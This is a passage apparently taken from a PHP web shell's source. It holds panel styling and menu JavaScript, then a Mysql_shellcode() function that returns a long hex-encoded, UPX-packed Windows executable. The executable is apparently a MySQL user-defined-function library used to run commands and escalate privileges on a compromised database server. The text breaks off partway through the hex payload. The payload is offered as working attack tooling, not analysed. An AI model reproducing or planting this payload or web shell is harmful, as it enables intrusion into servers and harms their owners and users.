a{height:22px;padding-top:1px;line-height:18px;width:140px;display:block;color:#FFFFFF;font-weight:bold;\r\n\ttext-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}\r\n\t.menu dl dt a:hover{color:#dddddd;}\r\n\t.menu dl dd ul{list-style:none;}\r\n\t.menu dl dd ul li a{color:#9f9f9f;height:21px;widows:140px;display:block;line-height:21px;text-indent:22px;\r\n\tbackground:#202020 no-repeat 13px 11px;border-color:#202020 #202020 #202020 #202020;margin-top:2px;\r\n\tborder-style:solid;border-width:1px;}\r\n\t.menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;}\r\n\t</STYLE>\');\r\n\thtml_n(\'<script language="javascript">\r\n\tfunction getObject(objectId){\r\n\t if(document.getElementById && document.getElementById(objectId)) {\r\n\t return document.getElementById(objectId);\r\n\t }\r\n\t else if (document.all && document.all(objectId)) {\r\n\t return document.all(objectId);\r\n\t }\r\n\t else if (document.layers && document.layers[objectId]) {\r\n\t return document.layers[objectId];\r\n\t }\r\n\t else {\r\n\t return false;\r\n\t }\r\n\t}\r\n\tfunction showHide(objname){\r\n\t  var obj = getObject(objname);\r\n\t    if(obj.style.display == "none"){\r\n\t\t\tobj.style.display = "block";\r\n\t\t}else{\r\n\t\t\tobj.style.display = "none";\r\n\t\t}\r\n\t}\r\n\t</script><div class="menu">\');\r\n}\r\n\r\nfunction css_main(){\r\n\thtml_n(\'<style type="text/css">\r\n\t*{padding:0px;margin:0px;}\r\n\tbody,td{font-size: 12px;color:#ffffff;background:#1f1f1f;}input,select,textarea{font-size: 12px;background-color:#dddddd;border:1px solid #fff}\r\n\tbody{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif;\r\n\theight:100%;overflow-y:auto;background:#0d0d0d;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}\r\n\tinput,select,textarea{background-color:#dddddd;border:1px solid #FFFFFF}\r\n    a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}\r\n\t.actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}\r\n\t</STYLE>\r\n\t<table width="85%" border=0 bgcolor="#555555" align="center">\');\r\n}\r\n\r\nfunction css_foot(){\r\n\thtml_n(\'</td></tr></table>\');\r\n}\r\n\r\nfunction Mysql_shellcode()\r\n{\r\n\treturn "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040ED064A10507506489FFD8FF9F2583EC0C5356578965E8C745FC0F7D0C0175236A00FFEDB77B012E05B008FF150970008945E4EB09B81E7363BB0124C38B2FFF000F8B4DF05FF6FFD94E0D5F5E5B8BE55DC20C0090008B442499ACFDF604C740081C100432C0C30F8F58FDAC7D0081EC8C090592C685E8FBFF77DFBD6100B9FF1733C08DBDE90DF3AB66ABAA33DB895DFC8B33DBBBFF450C8338010F85770380480439190A6C53EFFEFFBF80988B50088B0250E80A005DDC83C40885C00F84511A889DC8F6F720276B414EC9F6C785BC0A9FD9DC5D0C16899DC0090FC4D853A1FBF6DF8D8D1A518D95CCFA06528D85B80D500EB399661B2C256C44246CCDF7EFB116288B852A8985ACF605A866EEEE8C6C559C985668050134776723CD95C852240CBFBA8883C9DFDCFFB7FF9CF2AEF7D12BF98BF78BFA8BD1100E4F8BCAC1B3CDFDF6E902F3A50683E103F3A4FBF2083566B604D88B393284B4C1B5DB60E6D8FBB153006A0103FF6B63838A538B20B4283BC3752D6A0A6D84436EF0E8FB1C4F473ADBAF3D7C12516670380B52E917059E0B67B30CF72A18B9D0FA40FB0E72106AD1FA6803FA8D1D93CBD8D84268FF14D0FAC47E0990583A548D64D9BA6F3EE5117E8BF089B564B9535EC803C2993B046AA18BB810CD2ED81B0E567420C63C10FFB9E53B72C6000163E8EBBA1882FBB7B9850436D41105B0596A206A03049D306B6E037D7EB2BF0CF6B171F37B6883FEFF6A85385618DCEFEF2D94F889BD408D4764A80FF652F1DC2F942DB9590C89036A9D5679F8CFBE564F01515030108B13C6043A0009446C03E40BD18B3BD9687E2C089318580C04EB366A64B66C8DC972D031745813594ECE0E53C16551C83BE920FDC91E498B5514890AE98B03E63F61EE23C368C80B6389500C3BD37C2939D8751A3233C07F3001BB709155357A0C83910DBB954511420C8651C8D391AC91AE8D513763F24C9552CDB0069B6CC2A4E96551C51C8B6C76695D530C1FA86CB243C27B0C298B5BA5C3A71B4F08A40F8B400C8674DD5B768C07BC91591B00130BC8AEF1B72C1D750683C8FFC2C30E05DCC030D74E060C74092FF202EDB4329054554468020217F6FEBFFE7134F7D81BC04081C41A5E903D814C060F6808B8640426B073A466121C866DCBB6417B885DA87401A902ADB17EE3D2B76603B58845B71684FEF1888590FFFE7D72BB06563F84BD910AE983CF3F4F9B2E347D942C6A02227175943B5A018CEDF7751616FC1708EC3F79044888FEFE71103BC7751D560A1BC60B6C14326A107A8D74235F61B8E73A52180F66DB8D2C2C88980B531CAE9A338FCA02DD827A1D0E203DB8C9B537DC9004B9827E8B3089CAB4D6D37CB01D80B471D337110CE748BEDDEC6F6A081AA8D177E6489E04A0B6138D55A8E327325A00438D7DA883CE2D656B0763CE457537E59B512FD8B7C1028B8B8596504522D9BE1B6144418D4DA885C977DD1696139C2E06249C238D472834160750D28954283B70800CF2C67526537547C84B6CC025CF070D048CFFFEDF5EBC8549E4200866E4516A28AE11DB6E61BC52F88D2072229D489AB3985D2C1D8B35781C88D11B302A6C37DF5968311659FFFF1151BE82B96D42D6FC84FED51052D985CD06A5091CEBC5BA94506052022C069E0F3981C511788FA404FCF68450228B75087CC0807E09060A4B775B71A85F8B5E0C20D469D9D115CEF92011C8B80D124CB6177EA98AB6E00FC1E0028BC803C604C468141ADF02CC33C98A7DBFB566FBEF5E4CC1E102058D14018955E0803A4D4F586F8F818BB9AA01CC8BF2E266F3A7ED0CF26C164102C0159D0542D875477205B04C2C3908C10D00DA6E0D67EF1968D007001034E90B8795BC59C82DED1533F607B80774C03FFB9009C183C206298A023C2167DF7FE9743C843B1B3C0A741788843530421B46D889846744EBDB7FB907CABBFF6F29B6B53C33D2F3A6753B88954C0BB918D962C860784DB34C76739038C0B10B6C68E803C59378271EEB254A1D8E236534B0301BB135728144C60F4F9400D7493C77C7030B5E382E81D8BB7F1A837C2410027513060405750C5B6464046B5F23C357084F179213C888140525F1ECA263810C5456C9134CD8C9C22CBD4FE485DBCEE499566BF6CFE0FA8BCB2BCE490C0804904BB80768042700E0FE397221F724434558E0FE8108D87B96002F8BFB1B2A2327837CD98BFACBCB5073BCC8855098E0FE8D6FBFAC03B7B10DCC63DC0DAF234B21D18DC47AF02AFA7A568F638FA2C0EB0C0354AD46F2C505EED48821B01A60A081C4112684C3CFF4425689FF3B77D77857040CB911280D108D7C2418F3AB8D4C243B0D069B6C1451AB343101BA0B041B0111E5724E64F06650720D553D8755FD04BA917466380E6E8D542408D731F62D925266181108435C5C8F4F4A761850514F9481106A5CDFBFEACC4044076C1589B424809674C67652DD247C03788C5FB65E56B87B49BCBFF0FF255B3CCCCC8D87D4E1674755E7F0FF42DF86C00D5F613C5D6C7904F74104868B23B8065423740F795CEFDCD7B7A5108902B863C33E1210506AFE5C908E7F40F864FF35A900198E1AB52529582FDDD5B4BFC0ED742E3B932474FA34768B0CB38959BD2DB50A02C304B394751268F7DBBFEDBD2DB37D0EAAFF5408EBC3648F0543236C7286EA8C1A648B9C8184FF83DF7904687510E3520C3951087505CF4D05BBFB5351BB1E18EB0A082489DFDCB7B64B02439D6B0C595BFCEF56433230069F0BF758433030F7A5FAFCD82C10DBD10C74F740E42682B58DD63E3F45F812E11B8D08B67F97AD3E21737B08C1618D0C76B18FEA6EED5F744556558D6B10A80B5D5E410B33BBE85ED633783C25534F0DD41D2B38D3AF560C0E168D36B7DEDDB6C5648F358F550C3B08C77EBF73301A8B348FEBA1B8DBEB1CC9EB15884DD67A5C003F5D16466F684394BC3B8B298B419FCC256BB4031824E1D763D9B66E20CF56BDE8C0E010E24785ED75EC423C0AE0DD5B0D1A7E4DE47F34168D5AFF3ADD766B1B92784D1C8020770D2450EDC3FF4884157559598BC65EC9C3CF8DDCFAF7D7B26B71151008C3B7E0772212C7424B4F0434A759913916BDF01C6C7410131E97DEB2C3568BB5FB05D7383B42565777216A091C1FF8ECA245FBA424020C91EF2059E1DB46ED38CEC7FD85F675032863FCDA7F5E83C60F83E6F056887CA4BCC65CE23B3A6BFC4D5716F6460C4074ECEFB75D15660CB2174D29730510B35652F790357329C54E308374342411FAFEE42B502AF7FF761007176F9B34F5DD7D0525EB128B461C530B5FD2A4D87B1C0059644B2A20B25628752EE34A467A86B386F62C591AE1D81E2DFA85EFFD0A7C092CE61D90280DE157F8ED397D08470F94C0485BC31630077AC31A6E5DF1025B5756391803BA23977D6097CA146A401A0CB8CDDCF7039B4DB4DD40743DFD6E78405720AC597B741356C220D7843337E11962410B5957B4C5DA2E6018CC07835328D00CBC3010E326ABA73DB884FB1147D903CB8BFEEA5A8A4614B8F01759C93A47FF7704A94949608563EF1B385B5E5FC93A00513D7DBB8B3B1C279772148111222E2D10B5B73FF685011773EC2BC88BC40C8BE18B596EB4A32D685036C10C576D747A9BF8BAEB74D9C614F7C64D8B197507F8B77803AB756FEB21F646880747497425FF6BCFBA26291F75EB2D1D5183E303740DEE5EEF66201D2F4B75F38492C3F7C79ED9E0FD2874123AFD8A116A9B3BE93AEE6C182EFA2AD1DBC2F6C82E89FEC7D074AFBAA5DB2FB523FEC70603D083F0E8C28B4F78E1BFF5C604A900948174DE84D2742C84641EF7C26FB7B7B90F580C070875C639EB18818C34DDA3E272090E00046A2BC45A88533F550A3B6CF7EBEE075F75F8B07585A3CCFFEFDE8DC6974E8A11F161698A7101DDBF2B74644F7719148A074638D07415D90BD3D2A573E30A0A75F5FC5F51E242173E10F0078D7E436102FE3B2A50DD4E1DC60238E075C48A410376EDDDEF31188A66FF83C11074DFEBB12F348AC26B74851B9030F28DBC0CC34C05C7DB88DFFC83F8F988CC078FA7DBC668BEA3068E58BEB2427EBB8EDE3CA10E680D075925DEC12DBDD1F7FB12102760891664950803C1EDDB50F3375C32F7750940EE78769BDDD8EB7256641CA4C03968098DCC7BB3D96D345204371B366231A8FF0519627F7FBBC8EB3E6B3BC1752C390D0D7EBDFF07E6FB0AFC0D8E90E128E6320E175A89D8331A64FBC25507514EADD87E11B259BF5833A569A363097D56B457C7105EBDC0D6BB09833D482926C101740547D36EA3040322DAA4C4E809F4AED9996EFFD0080CC113CC04BCB6D410BF4E0F07EB8D01C90C4C6D6FB0BB1737575023F6467926A315ED8034032125F71F0117396C115B083C5BD8B9E241C0D01A8DD4D8B1AE6176BA310E97D801DB78C041E03A9A3A3AD3C57DCD2A7D3B8130AB756C462D6C36BE025E10A882D2F6A840B9EEDAB61BED074AA96604071017DE6EBFF77F3F4E0824FE890E89462F1883657524EF0337F72D6E66A90C0115F981FE8B03BFC75A289C0748750BC03F32AE6ABFFDD7073E3EEE5966F7270801577467420BDCB65FAC3E2BF88D48390E581849A489DEB99EF04E047E10053CFE53DCEB3683FBF6CBFFDFBA198BCB8BC3C1F90583E01F8B0C8D93808D04C002B6F4B2D08196B88498F6F320F399B156A107783A260A4B2CD15C8A9E88E614B7C0C24A0D74885507DF40A12932DF4E0C20EB0FCC16B8760C7CEB080DC2C1C8A50E864C17064802DFBA95A1E6798A1F09DB8975F411BAD06E02EC890F0EF406D1B705D74A8D370641D00939554ABF7DF7EC0F8CDC1780FB207C1304787F0E0FBE50152EC08631717461EB02F8BE2DBCBB0F84C60E94C1F804A70789D00F879A85F652EC30FF24901DB2834803CBB22CDB55CC02D8E0E4FCDCBC6DBB4D5D1D954883E8E43B0403742DC1B55EA20B1F4848840DA8D2C56E6E594039FC082708041CB28C1D0111808002C3128E9EFB2AF9B9509B687613661E6CC80F8D12469B89985B8ED80E27B476CBB2ED170A666C4441D0EBE98AF03EED5C2E641EF0D305BF30E7CE63398D0489361B346FCBDB56AE2E046874206CB880FB7790495E2EA005804DFD10EEC6FFE4203F367514807F0134CA4747271FDA628680771888D0AA8568B7C6ED0D1C0FB6C3F66601802291EC50147E06131E28981DCEB0C18DCC35EB4733181652F39BE127F8670F8F1CE508650F8D9600F9EF43DB5811EBA9847817E8430F849FB96D5D836D70036C100CB8E903AF74A146C6BE3008CCC08B25430BFDF0BD68BEFACAC54BC21921D0ADAED4DEFB894DF844E7B1C92D0E2DE47EB981381229DC7477B37D212AD64E85D220D466833878869FED5DCA094040EBE721CC80C320136B1B74AB408FB8FDF3CAD14DDB955F708DCFF3F006CB1A0D8DAFF1660377862E8848BF578089043A953F5B008DD1D6C5F490323FD80C298EDDBEBDD35A7432040974C5487CE801521C97B3B345FE3A6C59882AF4471A183147BD2002BB8916359DDE6F2CF64580D9CCB97F74170FBF00D1E8E369E652D7D8C3AD2DDC000CBF0E94AE6DB4BE6E81344D50C28D8314670B2D826B25D5165C50CCA2B5AFD483C05E08F05D4B053B6C377540FC0EBCC8D18B851FB082B8F7855082FCC9C6057EB581E69E741429F0003506BE67B324205C595D12AF788432611654562D750DD0C2BB653A29BDB9E06157A758888D8459A619694899ED2C1D0C059E0684B686FB2C805184FD331B23B1CF05F77491C9C15DD4273C602621F62BC1D1F847FD340BDB0582F6288038AF03ECF1D728176B2624FE853D6B2815CC074DBB7B10D410A6FEF65D8A13C645EA3004516377CF60DF678845EBEB4821083BC202EB35D6852E09971B209909669F08CD2DF0EC668909050706F514EB0E296A403C0A69BF1FD6A05FA53A7959EB413D74218519637405404A0C0FBB641B0CF6C099EB250BB7C8F220AFC0ECC908EBE0070E19B8F5C6DB741BE37F177C1AC073115883D2D6E2C30D9FF7DA698BFAC90B1FDEE0B50577DC83E700B27D09161B2D08FD1B2AFCAA3AC0B6FBC60BC77509E40060B733D6DEADD55E614A7F0619EE0F765B5DFDF4995250578AC009C476409C5FDB6E372AC48B66C33007C017112CCBF6DF063E39677E03035DD440F8F847D75CF78818EBB5502B0C027F02A51AEE9B03611880393075A90A009BBBEB24400FC601301A98D825DEFEB1B6F4935DFCF6C3D226F6C716CF5A8386068A2D5C0F0A2BEB47369A970902740B20C1E475E06035B6ED2B75E402F4180C7884BDDB61A91B201EF0C41011CD7C37B703EA1402E45015342C9001D94C3E3104306F6B97DA893E7441058B7EFBBB0B97688E3B78FFDD034347C8502DFC54A443DE9D7E328DE9516EA164CF3B1759984FDB962DD802C7155802F4F860A50AC977AC79A5D7193808FBF97DF729B3456313F9E86DEC99D334B75BE01830031706216D30D1354DA4ACE11B7440C6126F55424F490478DC11BA6D6C74898A02FF0EB6300BB90233E098006C4E9468254A90D68C71D8A3AE4A83B557AFA9E0B06AEA7E21B618B714AB63DB43B9833E0D07207FE3B5B628B5908B5CE81A4BE6775DD73831263C1C35100FBE065746CDE7EC505F363FC34BE26D6C3C72BE9F580081008DAE0673520C083B4163B3A177D951FC1C661D6F8DE0B474E8500F41CC5204B4702D700B30027114E0550798688478EAA3365283702294BC5DF20D50600F6E85C0750F6C60A1FBCF373E5333DB391D15B4282D5DC3431B267E44D8B8013D0E74FB768AED8D700C5540785BFF36FFD70810E0916D800A6AFF7604626BC75EEAD59C14433B487CCED915DB812D1BB81D785DF6568CFDDB41DC7078158184FFD6077415CA2083644457D42DB983867CBE100A06FE2B8F3C763BD13474230774741B647413A8AE012344D398367B845CC52BDCFF007CC45A2067C106D76A07845D1003CA44F85083EAC716DE3C856C6C3407753E576A181F3B1A1F3C8BF8D4336A113542FB8D06BC59078C08005957750ADA0E78B31F78893EEB067A1D84D9607F865F281A805E5D60FF57605AA8B11584CC40A48B4F485801B7B87501172BC5D86E2508B00006B41217B770A0FBACC70505A48BBDA118AD96AFC18DB107B88858F0E16FC47314B5042B500C81FAB27207DB210C6FBB14EBE8EC321C556E34D5880C2E6A41DEF22BA3DF60A36A5AAFC2FC57C1EE7F37AA817FCE8B7AFC69C904D24B448D8C8E1A35C50144695D695685463BF80C13F6C1012E757FFDF4B46FFAED3F495F0B0C3BCF76038E8B4C13043B03BFF84D4BF4486783F920731CBF2CD3EFBFFB5FE88D4C01C4D7217CB044FE09752B752139EB2483C1EEC15CB0E01E2D21BCB0C4124AAEF174240679F04D42ADB519DB55890A040803630DDAD6FEBB088C8BFBC1FF044F83FF3F7B865F2F5167A8DBBDE197ECC4422BE20562AEA711A188F8495ADB5AF7E6A464760589F3CA411BFB40ED56E09F3E3BFA76028ABF746B2E9101DB4C69BE51BDBA16B9E491EAD22154111E96900F0BBDD221944C72B66DB152BF49BE4A0B04658BD6CA0811910EECB610F9D40939B68900B2F9295B73DD1B0B26892F0E05087FFB652B974A638A4C0704EF20884D0FFEC1FDEBE2BB880B7325807D0F55BB888BCFD3EBD81A25DB7609190DECB109B10BC436592924DC4FE019D821B8672559040F9D84B7F0DFC0F009388B54D0891A895C13FCFF086BAA0FB348FA4EB09CDFA6AFFFACEE0D0DA80EC1E10F03480CBB03B159E9581653513A1F32068B3D081C0950080E3940DDCDDE0D31A4886C570FFE48431C7BC39F0A481080794313836004FE118378D65AA61D106C5310785A124642882D0910C9F48D72F5388B15F21430C1C2B146DA282BC892110AD307BE708D48145170411C6D428DF767FA85B43B05223518BFEEEFD81496B88905ACEB0324A3AC8935B0493138532A6627F7AE142F68578D3C822C1B8E0ED3C6481776F0176A4934000B6FD57D0E56D3EE83EDFFEE0BE0B899EB1026BE33F6D3E80EC62D3E173049AC0F3BDF7FBF5D58E20873E14BE13B232B23FE0BCF75DDAE718B0B24143B9A1872E707756D26E4FB798BDA3BD8261505EBE6740BD7A019AC24C2837B3C3BD72A68891337EBED2681397B870D1B2FEEDBC8DC7646270B7B85DB90530E61DBE2F6BC595B1089FA43A8386C75EF6E6B071BE91406891DA5148B886F0BB016FAFEFC2D8B8C90C4B6B387FDAD904488378B127011557DA1A156DD1F000E440BD68B563077BF0B75178B91841CFF45FC04BF35EBA6FFFE23390BD774E98B97CA33FF5C5A741B87584D764C57CEE68DBA12C166EC645F9DBAED0AFD7C05D1E147EB752054F9430A2BE956EFEA7FF17BC1FE044EDE3F7EF83AC9DCB85E3BF79B0D0124617421206D207D2B11A27C383AEEFEB69CD3F3EC235C88448903FE0F75EA08B181F48E7B210BEB31172B5CBBC56895A1322119293673148215982C85220AA6D76593C07A04F80095AF3F4735D77A089084C5A97CF10348AD6D420CA522C264A974B32C06FE0B7D29C499C636576A0B331162BFB0CE6EBB64978C093B0A8F097CAEEB2FEF437AC0280D8D4EB6097B04B15C8F74B1BCAD16BEEE09376A2EB7F4AEF70B890A8903FCB2790DBFED56AE03D122011232FC9F8B34126FB70E218D790F3E751AA9B0A011A92BDC4B3BA406A49772C16B119C8D420408A1C41769A10220A489C09A6E6D44B6305F89507250D401E924E15797903B319841A10B889CC0930BF8653DB868C4411B45CBD81233305C81335C89834517F04610742A1B20655783363A63198CB014BDA5461C586460B47CB1856EAD4E24C5897E060562244A196A41B98BC36E74F1E051DF3771C84108343B5A2DDCC54FE043C331B63E6E3769C0815AFB3082C3026CB745EA40080204DE4A1E88D0AD5BFB85C1E7DF790C47A68686BDE88B3B08D13768ED4D2728B28D97101342773C47834BDB8D477748F283887EF4368379778D88FC06C740FCF0420EEFD0E77E01C24804C780E810140517EA0D7E3B48F09676C78B744F0CEDADFBC405F8FC015F2689AC8D4A0C087FB8BD6C8F41649E4442BC9EE38A46438A6F75D78DC80B84C07A884E43A30978047050608CBA2CCB687EA5266189BDC3ABA031BEAB17B614AB5ECCB80002BD063BC67D07EE07DA5BA319DB134451590D8DB535C5949808211256F4A0FA648B9018E21A33C9B874EBB7193D601519890476C020D46CEFC0D50884887CEA1CBA187C8A05A09A5BFE1134B5E055539F8B04865274C3F02F5E586F0A20C220418D82787CD1AD76BBA8A29BAC80448E8C458D3746DD05E97ADEE9B96A61A796EDDF72175F6877102B56F8C03B75466E436659C37CD780A065A52718F8141E1E722A5B76E9225120592139250384205934F449A884E2948073382CC6A1FE435607F644810401741D57A86F7264B348442A7448A3FCC6CF50E245D2C775C00ADB83F4E16C668AE85C39023A3E046A9095C4166A02CBDD6BC416264B1F593BC71C196610672B59CD696F29DA19821C24DFFF1D0A05DCDB4783A383E61FF3EF8A0635FAC7A40CF68064880400C60851AE70BF7F5F597D0FC1768182434EA883C3A8FC63B4B42A197808CA6681660CF7FB3360DBD2525E06900802042A635FC5A8648605C2F6FD1FE5EA460D409C6C48C5F7D8595E1B4B5F015E991B2E0C8957FBF609705C8080F9D53766A908E0B36F1368317B907E2657503BBFADE0401BD00E8B8074DC0DB4EB0E24FD07EB072483CBFF30351A9B81EF8B5FF6F5C154F85CC185B5ACF1279788D15A63F90E7A593917EDF118D97E74A1BBFFCDA30AA57A745FF6401D32AAC18561ECA218591A8517DFBB806DC11830AF01750F505222BC80D608851D37C597B58E4A50FF028B1A7536B654EC020BF841CEB04FF44A9DE370EC463B737C8CB1423914D98487B70160C37402FB5B36E42806FDA08A7477A50538839E890BA9639456E1A05FD68E48A06017858ED552908E4C6B80C4EAAF3109BB47752053951FDA5B57F7079E8D4614759F0658A54A340BA518EB56044261DBB65E097E123E0704C53F7CD5E1EE02115B5F5B5E95DD0001C3A150DC9BBA831B0B3F6116D080660DEE6118962668025B6C02664959538926F4317D0FAF7D10012334068B5B078BDF3C2E9A45D7CE0AA8AE74157E457AFB96A27C4014A78B7781E10868B1ABEDE67429191174229580AB1616697212F863F186A53FA9495C297E393EF62BDF017D321EBC6CD046147246CD63DA56A250177A4E74D391EDADDDBBD2F76B402BFAEB42FBE3F66B1935744701982BD83F1A608976723EB00729D10F234482252450E9D42E4AE0BE169FA44BA586D8080CF1A7264385F0385DD08157106F6A23B633A465C72B7483E7FE545B3CCF56C179148A0141CEF06CA387400E75F1B3ED814975AA01605E2CDD0623955CE88AFC2B32B9A7BA51C724A95E1306B6F57EA30719EBCD8D41FF559CC309824C32C9FEFDFCD126301C8687398FA4DF221A7A0BD2F86E8A073C61051BB4F4741A3C727C3CCC22BFD1D675FE0192EB20C99601EB08B909786157731209405A8A1D473AC31DB46DB6B5E33BD307DB60BEF652DB85C016547F3E601A2B74450475DBD6F21974360E61484CAC1F39FF2C98AD6108A328FC83C920EBB72F7D2063148E10EBA22240757D0BA54D6F0940EB982C7573E993E6006EA0B7FC0F0281CE0DEB82B8BA7D5C782AC8860BC834DB656274BE8BB60DCB2E070B42067540F6C5B6B7D8B7C73B80CD401E63F8752E5FF89315FE0A37E6FFBF9B16175DECD521CE84163A741DD9621B8DD20B418068A4D71362C3242210EA4C917EA9543C7DC4103BCB7D701A2C68DB12B73A896A89588018040859334A6C021C82005196FB871825A0590F8E9D7855AE209F1F3BC374377521509175ACB30D1BB16D14501D16E97FEBC4EBBA3CB1EB446A38C1E602C23268066B62600E56063A65306C327A7815DE4B1B96B3273CFB384F108C5F58DB56B604020CBF1F041C7EA1819D355975CC00D885F6E36DFF118DA424AB8D6406075AD5AA838AE5531FE0FEC7780B3708F7C2DB138A0A4238D974D18437EACF9683511275ED0BD857FBE310281E4BB5560893BFE5F8F18D6E5D33CB0365F983F1FFF0CF33BF3F4A3770C204EEF3751C250674D37F51D83AC508C1B475C45E357E0B5A808C8B42FC38D867A67BD33713EF38DC742717E7C1E81012157BD66E9ADC06D4EB962DB142FE377A38279D06FDFC0494C36B20EE5002FFD0371404E634449EEF32AC0E0400F3C3F32CC015505431F5DF64B1025F0E57299A11FC45438A3999947511064E18C1096C987394302FFE36C50C00E714892290881DC2F5115EDF753C8690D7C58C568D71E2EE112F52F07213AC9A83EE04883CDFC7349073ED5E972018AD20CF57A1102824851B7B7F8D5BC50BA35FC3816A9480BC60711B88116A0DEC08B25DB038E194D7730D70F6B55660C6FB6A192A6339BBB1C935A4F6C08490546A74E2A0D18E50ED8BF06B7875239F5A93565B8490A04018A50A8CFD37333859109C0462BF193868305333528CA116131E782F690E182FD118D1D80D41C3BB505244A06D10F00653BE5660368B9464F20D1CD94730B00D3F8A26684BC9911588EB227536D99B1059ACF545305BC392D09113D0022FDB610D506E746CF12499906D19450D283009999009384098EC9D9044503DEE10560B0EECA4FC00CA5E4F16D4E81A48506896046AD2546CF4691B8DA62874879FD9942100DE784F9B862947731E8085F74FECDD0EFF8BC646050AA127E253F4A8DF24051FEBDE784B518CBAC46620EA001F5B9B86281ABBC6388DD98DDD02AE1A81EA7D0851F8BAB787897C79E3677D56BE4C84983D04CB930D83839A1F6B556AC082C1731C806008F6D6A55960408B0E882481C1806DF5CC31E06D4D7CB76E8B130D1588092ACE4C3B04BCB1508BAAF926388A03BE126DB4BE32527572AABC04ACA41A4123404AFD37E0487D8B0989088A0B88488F05BE558B0AFC3BF77CB485016FF04E5B23333C81FFFDAD50BA3C754D290E2F75056AF658EB099B09BA92C348C397F50DC96E1BD0B84AFF7A175770340A9D800C5B0A25C1068D1B9906804BA40FEFB6700D540A0A700405804383FB6130F2E1037C97B89480B40638B491DEBE7B5E375778A8F0056E4673218D70837BFC00FB7DC26DAC0B7C2083C79683C324C8D00CBA2072E2854824720F338825B85473C487A01D94885B155434811237F8D58DCC6B8A069ED218A996783C3D74A756FA8DC26D4B140AC3E8F9BD581D3F9EF1C63B3BF3318E74410955BF1D267B41381F74395583D8ED8F348BE85945803F49225534521DBBCC54C02E579D4F6C67C4BEFD9A5903FD3775C95DFF84C28934C768BF1D0B891EAE9484015BA2BBB25983BDBE8A98994FC1A75456530DC0A15A84E38FA2848BFE3818747463A5FA7DA307FC5053539F37B4040B0CDB05C90488D486186DD8A46BD6A1082F2700C34A7424864635A6A08D355F485A6C9C9232B1458A68B14C18D147EFF317208321008B7510C700B50156B0802BEF4937A05BFFDFA0AE80382275448A50014080FA22FE84AE1B2FFFD274250FB6D2F68292610425FF012B3B3256FA068A108816F60BD5EBCE0C6E6FA11124CB46401CEB43F2B645C61E05044044DAF683D6DCFD5B1918881E4665207409090870ACF5F20975CC750348C34A66FF9A5AA946B5674EB5E003F0BE66442B052787A281993117C8BC15CE169739FF02FB0885FA5AD0B8225C75C8DA922C7FE1C6AD02752541397D6D0D807801228D86257A6BE31D8BC2EBA3080CF0DB770416180F94C28905D1EB8BD34B88F6EF02F30E4388C6065C46B16AADAE355980A74A4693682E4C67168A3F863D1306ACDBE32E2819E2061F7303C2091B0F400315016B43F850BF38A0300F0E95A9E1EE6EC70383278E140246DDD1306449258F9C5378446DA830D4E06CF633141A8DCD4D04D50E0B49180F407B7B21892858CC428BC6D047F317EA10C700CE1B02433A45DBACA33CE581430C3F27C2BDDD5A3766391E6AEB4040081875F96DFC419F06F22BC6CFCCD1F88E40DA2A5AA3025D038A345852EB0DCCE83BEBAC3213B75683C9AC1C55508D3A57D05C242521D20C10CAB56A90275C2703F6756B0C92C888EB53624CA54A0592B985B1566089DFF6858D740A40387BFB04F62B223760495B6A55CE03F6EB727180A50BBA560F91E248D0CEBAC4BA9E5D5B20070261ED572A381026E821681A536C106A7450A213FF153A152B3859450C163A448330D4653B5BB95BD0D7EC084144F77CF0DE6889F134F18E033B961ACCC230B7471C2A6C45E8F75437E9700D10D77AFA75037A08B60BF18F5CBD59A522560055016B47C1BA30131750E0506DD65B3A3B591257D9BD07A8D6D90B3040963C76291950BBFDBE7076F80D838D6A0303F841DC5739B99D10B3105560FFC05D36763610570C7C1DBC7D36EB9E10FFB6D3C41611681020F8F6B9ACA927945450592C5FEB26165A6C81A38D30C7F23612B1DD0482086AF4D56CC881110FD85EC90E40C128265325F34226D911163C8B14C0012B0C8329EB2D3983D71C90A756F6DC784CC8D5EB7438B125213EF950E99ECEF2B2D61C11A9AEA880643C287BEEFD8DAD8AD73D63F3831881D51404B03582AFB210EA02F01B61E0594E3EE9B3B68D4B38F7881CB50C80F4C025622BC08B03317E30641C5E45AB0EE3A24C96880D535B24C67C80066F04368EC1F10C5229231AE3AEF90F86EAA0ECF1EE5BD5416E2BB64D1073290AD62EB045A58A95F90A7409FFDEB